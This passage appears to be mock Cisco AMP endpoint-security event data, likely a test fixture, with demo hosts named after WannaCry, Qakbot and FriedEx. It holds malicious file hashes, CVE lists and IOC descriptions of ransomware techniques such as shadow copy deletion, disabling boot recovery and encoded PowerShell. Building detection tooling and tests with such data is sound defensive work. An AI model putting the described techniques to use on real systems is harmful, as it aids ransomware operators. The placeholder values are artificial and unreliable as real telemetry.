malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
